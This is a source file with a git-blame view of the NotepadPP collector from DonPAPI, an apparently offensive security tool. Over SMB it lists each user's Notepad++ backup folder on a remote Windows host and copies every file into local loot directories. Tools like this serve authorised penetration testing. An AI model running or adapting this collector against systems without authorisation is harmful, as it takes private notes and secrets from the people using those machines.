DonPAPI/donpapi/collectors/NotepadPP.py

import ntpath
from os import path 
from typing import Any
from dploot.lib.target import Target
from dploot.lib.smb import DPLootSMBConnection
from donpapi.core import DonPAPICore
from donpapi.lib.logger import DonPAPIAdapter
from donpapi.lib.utils import dump_file_to_loot_directories


class NotepadPP:
    user_directories = ["Users\\{username}\\AppData\\Roaming\\Notepad++\\backup\\"]

    def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list, options: Any, logger: DonPAPIAdapter, context: DonPAPICore, false_positive: list, max_filesize: int) -> None:
        self.tag = self.__class__.__name__
        self.target = target
        self.conn = conn
        self.masterkeys = masterkeys
        self.options = options
        self.logger = logger
        self.context = context
        self.found = 0
        self.false_positive = false_positive
        self.max_filesize = max_filesize

    def run(self):
        self.logger.display("Gathering notepad++ backup files")
        for user in self.context.users:
            for directory in self.user_directories:
                directory_path = directory.format(username=user)
                self.dig_files(directory_path=directory_path, recurse_level=0, recurse_max=10)
        if self.found > 0:
            self.logger.secret(f"Found {self.found} notepad++ backup files", self.tag)

    def dig_files(self, directory_path, recurse_level=0, recurse_max=10):
        directory_list = self.conn.remote_list_dir(self.context.share, directory_path)
        if directory_list is not None:
            for item in directory_list:
                if item.get_longname() not in self.false_positive:
                    self.found += 1
                    new_path = ntpath.join(directory_path, item.get_longname())
                    file_content = self.conn.readFile(self.context.share, new_path)
                    if file_content is not None:
                        absolute_local_filepath = path.join(self.context.target_output_dir, *(new_path.split('\\')))
                        dump_file_to_loot_directories(absolute_local_filepath, file_content)
                        
                        collector_dir_local_filepath = path.join(self.context.global_output_dir, self.tag, new_path.replace("\\", "_"))
                        dump_file_to_loot_directories(collector_dir_local_filepath, file_content)
Create notepadpp.py 2024-10-17 13:27:14 +00:00			`import ntpath`
Collectors engine rework 2024-10-21 09:53:16 +00:00			`from os import path`
Create notepadpp.py 2024-10-17 13:27:14 +00:00			`from typing import Any`
			`from dploot.lib.target import Target`
			`from dploot.lib.smb import DPLootSMBConnection`
			`from donpapi.core import DonPAPICore`
			`from donpapi.lib.logger import DonPAPIAdapter`
Collectors engine rework 2024-10-21 09:53:16 +00:00			`from donpapi.lib.utils import dump_file_to_loot_directories`
Create notepadpp.py 2024-10-17 13:27:14 +00:00

Collectors engine rework 2024-10-21 09:53:16 +00:00			`class NotepadPP:`
Create notepadpp.py 2024-10-17 13:27:14 +00:00			`user_directories = ["Users\\{username}\\AppData\\Roaming\\Notepad++\\backup\\"]`

Collectors engine rework 2024-10-21 09:53:16 +00:00			`def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list, options: Any, logger: DonPAPIAdapter, context: DonPAPICore, false_positive: list, max_filesize: int) -> None:`
			`self.tag = self.__class__.__name__`
Create notepadpp.py 2024-10-17 13:27:14 +00:00			`self.target = target`
			`self.conn = conn`
			`self.masterkeys = masterkeys`
			`self.options = options`
			`self.logger = logger`
			`self.context = context`
			`self.found = 0`
Collectors engine rework 2024-10-21 09:53:16 +00:00			`self.false_positive = false_positive`
			`self.max_filesize = max_filesize`
Create notepadpp.py 2024-10-17 13:27:14 +00:00
			`def run(self):`
			`self.logger.display("Gathering notepad++ backup files")`
			`for user in self.context.users:`
			`for directory in self.user_directories:`
			`directory_path = directory.format(username=user)`
			`self.dig_files(directory_path=directory_path, recurse_level=0, recurse_max=10)`
Collectors engine rework 2024-10-21 09:53:16 +00:00			`if self.found > 0:`
			`self.logger.secret(f"Found {self.found} notepad++ backup files", self.tag)`
Create notepadpp.py 2024-10-17 13:27:14 +00:00
			`def dig_files(self, directory_path, recurse_level=0, recurse_max=10):`
			`directory_list = self.conn.remote_list_dir(self.context.share, directory_path)`
			`if directory_list is not None:`
			`for item in directory_list:`
			`if item.get_longname() not in self.false_positive:`
			`self.found += 1`
			`new_path = ntpath.join(directory_path, item.get_longname())`
			`file_content = self.conn.readFile(self.context.share, new_path)`
Rework notepad, powershell, recent files. Add cloudcred, ideprojects, passwordmanagers, recyclebins, sshsecrets and versioncontrolsystems 2024-10-21 11:55:52 +00:00			`if file_content is not None:`
			`absolute_local_filepath = path.join(self.context.target_output_dir, *(new_path.split('\\')))`
			`dump_file_to_loot_directories(absolute_local_filepath, file_content)`

			`collector_dir_local_filepath = path.join(self.context.global_output_dir, self.tag, new_path.replace("\\", "_"))`
			`dump_file_to_loot_directories(collector_dir_local_filepath, file_content)`